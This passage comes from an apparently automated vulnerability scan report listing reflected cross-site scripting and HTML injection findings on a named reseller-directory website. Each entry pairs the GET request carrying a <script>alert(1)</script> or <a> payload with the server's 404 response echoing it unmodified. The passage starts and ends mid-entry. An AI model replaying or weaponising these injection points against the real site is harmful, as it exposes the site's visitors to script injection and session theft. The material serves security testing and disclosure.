<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46a0f45<script>alert(1)</script>666e5a2a56c/ was not found on this server.</p>
...[SNIP]...

2.3261. http://www.resellerbase.com/detail/46/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dd870<script>alert(1)</script>b1c2d873550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/?dd870<script>alert(1)</script>b1c2d873550=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/?dd870<script>alert(1)</script>b1c2d873550=1 was not found on this server.</p>
...[SNIP]...

2.3262. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/hubshout-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88be0<script>alert(1)</script>311bd6d613a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail88be0<script>alert(1)</script>311bd6d613a/46/hubshout-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail88be0<script>alert(1)</script>311bd6d613a/46/hubshout-com.html was not found on this server.</p>
...[SNIP]...

2.3263. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/hubshout-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f8a0<a>4be4ea51f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/464f8a0<a>4be4ea51f91/hubshout-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/464f8a0<a>4be4ea51f91/hubshout-com.html was not found on this server.</p>
...[SNIP]...

2.3264. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/hubshout-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11a6d<script>alert(1)</script>5788702c3fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/11a6d<script>alert(1)</script>5788702c3fe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/11a6d<script>alert(1)</script>5788702c3fe was not found on this server.</p>
...[SNIP]...

2.3265. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c804a<script>alert(1)</script>02a28d84161 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc804a<script>alert(1)</script>02a28d84161/46/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc804a<script>alert(1)</script>02a28d84161/46/rating.php was not found on this server.</p>
...[SNIP]...

2.3266. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0ea9<script>alert(1)</script>a78a4514d61bd75da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailf0ea9<script>alert(1)</script>a78a4514d61bd75da/46/rating.php?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0ea9<script>alert(1)</script>a78a4514d61bd75da/46/rating.php?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3267. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5c26<script>alert(1)</script>7f9b0ff0bc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46d5c26<script>alert(1)</script>7f9b0ff0bc9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46d5c26<script>alert(1)</script>7f9b0ff0bc9/rating.php was not found on this server.</p>
...[SNIP]...

2.3268. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1e86<script>alert(1)</script>49db44ded2ee9f3ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/46d1e86<script>alert(1)</script>49db44ded2ee9f3ef/rating.php?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46d1e86<script>alert(1)</script>49db44ded2ee9f3ef/rating.php?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3269. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5ca44<script>alert(1)</script>5663ffddb04af14ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/46/rating.php5ca44<script>alert(1)</script>5663ffddb04af14ff?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.php5ca44<script>alert(1)</script>5663ffddb04af14ff?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3270. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eec20<script>alert(1)</script>c1861b1cd96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/rating.phpeec20<script>alert(1)</script>c1861b1cd96 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.phpeec20<script>alert(1)</script>c1861b1cd96 was not found on this server.</p>
...[SNIP]...

2.3271. http://www.resellerbase.com/detail/46/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d61a<script>alert(1)</script>2cfcfac51c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/rating.php?3d61a<script>alert(1)</script>2cfcfac51c8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.php?3d61a<script>alert(1)</script>2cfcfac51c8=1 was not found on this server.</p>
...[SNIP]...

2.3272. http://www.resellerbase.com/detail/46/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8da60<script>alert(1)</script>df19e2dac8ea5b066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/46/rating.php/8da60<script>alert(1)</script>df19e2dac8ea5b066?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.php/8da60<script>alert(1)</script>df19e2dac8ea5b066?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3273. http://www.resellerbase.com/detail/46/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c255<script>alert(1)</script>9ef7ece63be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9c255<script>alert(1)</script>9ef7ece63be/46/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9c255<script>alert(1)</script>9ef7ece63be/46/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3274. http://www.resellerbase.com/detail/46/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79ab5<script>alert(1)</script>5f85d62ee66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4679ab5<script>alert(1)</script>5f85d62ee66/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4679ab5<script>alert(1)</script>5f85d62ee66/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3275. http://www.resellerbase.com/detail/46/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37afb<script>alert(1)</script>753f6aa2529 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/search.php37afb<script>alert(1)</script>753f6aa2529?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php37afb<script>alert(1)</script>753f6aa2529?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3276. http://www.resellerbase.com/detail/46/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fc44a<a>5892cb24b0f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/search.php?keyword=search...&Submit3=Searchfc44a<a>5892cb24b0f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...&Submit3=Searchfc44a<a>5892cb24b0f&opt=2 was not found on this server.</p>
...[SNIP]...

2.3277. http://www.resellerbase.com/detail/46/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b1be1<a>35db2d193d6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/search.php?keyword=search...b1be1<a>35db2d193d6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...b1be1<a>35db2d193d6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3278. http://www.resellerbase.com/detail/46/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4f9c<script>alert(1)</script>ac68ee46070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/search.php?keyword=search...&Submit3=Search&opt=2&f4f9c<script>alert(1)</script>ac68ee46070=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...&Submit3=Search&opt=2&f4f9c<script>alert(1)</script>ac68ee46070=1 was not found on this server.</p>
...[SNIP]...

2.3279. http://www.resellerbase.com/detail/46/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 45792<a>7debffc74b4 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/search.php?keyword=search...&Submit3=Search&opt=245792<a>7debffc74b4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
